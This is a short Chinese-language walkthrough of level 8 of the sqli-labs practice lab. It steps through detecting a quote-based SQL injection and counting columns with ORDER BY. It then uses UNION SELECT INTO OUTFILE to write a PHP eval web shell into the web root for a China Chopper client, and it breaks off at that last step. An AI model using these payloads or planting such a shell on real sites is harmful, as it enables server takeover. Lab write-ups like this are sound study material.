Less（8）

1.先判断注入类型

　　

 　　（1）首先看到要求，要求传一个ID参数，并且要求是数字型的；?id=1

　　　　

 

 　　（2）再输入：?id=1 and 1=1

　　　　

 

 　　（3）输入：?id=1 and 1=2

　　　　

 

 　　　　因为（2）（3）没有变化，所以不是数字型

　　（4）输入：?id=1'

　　　　

 

 　　　　提示消失了，说明有错误

　　（5）加上--+，我们再输入：?id=1' --+

　　　　

 

 　　　　结合（4）（5），我们可以看出来参数id='1'

2..对列数进行判断

　　（1）输入?id=1' order by 3 --+

　　　　

 

 　　（2）?id=1' order by 4 --+

　　　　

 

 　　　　3正常，4错误没有显示，说明是3列

3连接菜刀

　　（1）输入：?id=-1' union select 1,2,'<?php @eval($_POST["crow"]); ?>' into outfile "C:\\phpstudy\\PHPTutorial\\WWW\\sqli-labs-master\\Less-8\\my.php" --+

　　　　

 

 　　（2）在菜刀中添加